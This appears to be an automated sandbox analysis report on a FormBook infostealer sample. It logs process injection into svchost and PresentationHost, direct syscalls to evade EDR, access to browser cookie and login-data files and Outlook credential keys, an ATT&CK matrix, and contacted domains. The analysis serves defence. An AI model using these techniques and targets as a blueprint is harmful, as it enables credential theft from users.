          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A9D0 mov eax, dword ptr fs:[00000030h]1_2_0323A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A9D0 mov eax, dword ptr fs:[00000030h]1_2_0323A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A9D0 mov eax, dword ptr fs:[00000030h]1_2_0323A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A9D0 mov eax, dword ptr fs:[00000030h]1_2_0323A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A9D0 mov eax, dword ptr fs:[00000030h]1_2_0323A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032649D0 mov eax, dword ptr fs:[00000030h]1_2_032649D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FA9D3 mov eax, dword ptr fs:[00000030h]1_2_032FA9D3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03252835 mov eax, dword ptr fs:[00000030h]1_2_03252835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03252835 mov eax, dword ptr fs:[00000030h]1_2_03252835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03252835 mov eax, dword ptr fs:[00000030h]1_2_03252835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03252835 mov ecx, dword ptr fs:[00000030h]1_2_03252835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03252835 mov eax, dword ptr fs:[00000030h]1_2_03252835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03252835 mov eax, dword ptr fs:[00000030h]1_2_03252835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A830 mov eax, dword ptr fs:[00000030h]1_2_0326A830
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D483A mov eax, dword ptr fs:[00000030h]1_2_032D483A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D483A mov eax, dword ptr fs:[00000030h]1_2_032D483A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BC810 mov eax, dword ptr fs:[00000030h]1_2_032BC810
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BE872 mov eax, dword ptr fs:[00000030h]1_2_032BE872
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BE872 mov eax, dword ptr fs:[00000030h]1_2_032BE872
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C6870 mov eax, dword ptr fs:[00000030h]1_2_032C6870
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_006581F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_006581F7
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_0062A364 SetUnhandledExceptionFilter,0_2_0062A364
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_0062A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0062A395

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Found direct / indirect Syscall (likely to bypass EDR)
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exeNtClose: Direct from: 0x76F02B6C
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exeNtUnmapViewOfSection: Direct from: 0x76F02D3CJump to behavior
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\PresentationHost.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: NULL target: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: NULL target: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Windows\SysWOW64\PresentationHost.exeThread register set: target process: 7764Jump to behavior
          Writes to foreign memory regions
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 29B4008Jump to behavior
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_00658C93 LogonUserW,0_2_00658C93
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_00603B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00603B4C
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_00604A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00604A35
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_00664EF5 mouse_event,0_2_00664EF5
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\nJ8mJTmMf0.exe"Jump to behavior
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exeProcess created: C:\Windows\SysWOW64\PresentationHost.exe "C:\Windows\SysWOW64\PresentationHost.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\PresentationHost.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_006581F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_006581F7
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_00664C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00664C03
          Source: nJ8mJTmMf0.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
          Source: nJ8mJTmMf0.exe, TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4121602275.0000000001A81000.00000002.00000001.00040000.00000000.sdmp, TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000000.1895094072.0000000001A81000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4121602275.0000000001A81000.00000002.00000001.00040000.00000000.sdmp, TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000000.1895094072.0000000001A81000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4121602275.0000000001A81000.00000002.00000001.00040000.00000000.sdmp, TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000000.1895094072.0000000001A81000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4121602275.0000000001A81000.00000002.00000001.00040000.00000000.sdmp, TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000000.1895094072.0000000001A81000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_0062886B cpuid 0_2_0062886B
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_006350D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_006350D7
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_00642230 GetUserNameW,0_2_00642230
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_0063418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_0063418A
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_00604AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00604AFE

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.4125575598.00000000082C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1978005632.0000000003080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1977710626.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.4121057875.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1978344060.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.4121859503.00000000045C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\SysWOW64\PresentationHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\PresentationHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\PresentationHost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\PresentationHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\PresentationHost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\PresentationHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
          Source: C:\Windows\SysWOW64\PresentationHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
          Source: C:\Windows\SysWOW64\PresentationHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\SysWOW64\PresentationHost.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
          Source: nJ8mJTmMf0.exeBinary or memory string: WIN_81
          Source: nJ8mJTmMf0.exeBinary or memory string: WIN_XP
          Source: nJ8mJTmMf0.exeBinary or memory string: WIN_XPe
          Source: nJ8mJTmMf0.exeBinary or memory string: WIN_VISTA
          Source: nJ8mJTmMf0.exeBinary or memory string: WIN_7
          Source: nJ8mJTmMf0.exeBinary or memory string: WIN_8
          Source: nJ8mJTmMf0.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.4125575598.00000000082C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1978005632.0000000003080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1977710626.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.4121057875.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1978344060.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.4121859503.00000000045C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_00676596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00676596
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_00676A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00676A5A

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire Infrastructure2
          Valid Accounts          		2
          Native API          		1
          DLL Side-Loading          		1
          Exploitation for Privilege Escalation          		1
          Disable or Modify Tools          		1
          OS Credential Dumping          		2
          System Time Discovery          		Remote Services1
          Archive Collected Data          		4
          Ingress Tool Transfer          		Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault AccountsScheduled Task/Job2
          Valid Accounts          		1
          Abuse Elevation Control Mechanism          		1
          Deobfuscate/Decode Files or Information          		21
          Input Capture          		1
          Account Discovery          		Remote Desktop Protocol1
          Data from Local System          		1
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
          DLL Side-Loading          		1
          Abuse Elevation Control Mechanism          		Security Account Manager2
          File and Directory Discovery          		SMB/Windows Admin Shares1
          Email Collection          		4
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
          Valid Accounts          		3
          Obfuscated Files or Information          		NTDS116
          System Information Discovery          		Distributed Component Object Model21
          Input Capture          		4
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
          Access Token Manipulation          		1
          DLL Side-Loading          		LSA Secrets151
          Security Software Discovery          		SSH3
          Clipboard Data          		Fallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts312
          Process Injection          		2
          Valid Accounts          		Cached Domain Credentials2
          Virtualization/Sandbox Evasion          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
          Virtualization/Sandbox Evasion          		DCSync3
          Process Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
          Access Token Manipulation          		Proc Filesystem11
          Application Window Discovery          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt312
          Process Injection          		/etc/passwd and /etc/shadow1
          System Owner/User Discovery          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1466073 Sample: nJ8mJTmMf0.exe Startdate: 02/07/2024 Architecture: WINDOWS Score: 100 31 www.adoby.xyz 2->31 33 www.wepayassessments.com 2->33 35 18 other IPs or domains 2->35 39 Snort IDS alert for network traffic 2->39 41 Malicious sample detected (through community Yara rule) 2->41 43 Antivirus detection for URL or domain 2->43 47 5 other signatures 2->47 10 nJ8mJTmMf0.exe 4 2->10         started        signatures3 45 Performs DNS queries to domains with low reputation 31->45 process4 signatures5 57 Binary is likely a compiled AutoIt script file 10->57 59 Writes to foreign memory regions 10->59 61 Maps a DLL or memory area into another process 10->61 63 Switches to a custom stack to bypass stack traces 10->63 13 svchost.exe 10->13         started        process6 signatures7 65 Maps a DLL or memory area into another process 13->65 16 TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe 13->16 injected process8 dnsIp9 25 www.kosherphonestore.com.cdn.hstgr.net 84.32.84.112, 49736, 80 NTT-LT-ASLT Lithuania 16->25 27 synergon.space 109.95.158.127, 49758, 49759, 49760 DHOSTING-ASWarsawPolandPL Poland 16->27 29 9 other IPs or domains 16->29 37 Found direct / indirect Syscall (likely to bypass EDR) 16->37 20 PresentationHost.exe 13 16->20         started        signatures10 process11 signatures12 49 Tries to steal Mail credentials (via file / registry access) 20->49 51 Tries to harvest and steal browser information (history, passwords, etc) 20->51 53 Modifies the context of a thread in another process (thread injection) 20->53 55 2 other signatures 20->55 23 firefox.exe 20->23         started        process13

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          nJ8mJTmMf0.exe58%ReversingLabsWin32.Trojan.Leonem
          nJ8mJTmMf0.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js0%Avira URL Cloudsafe
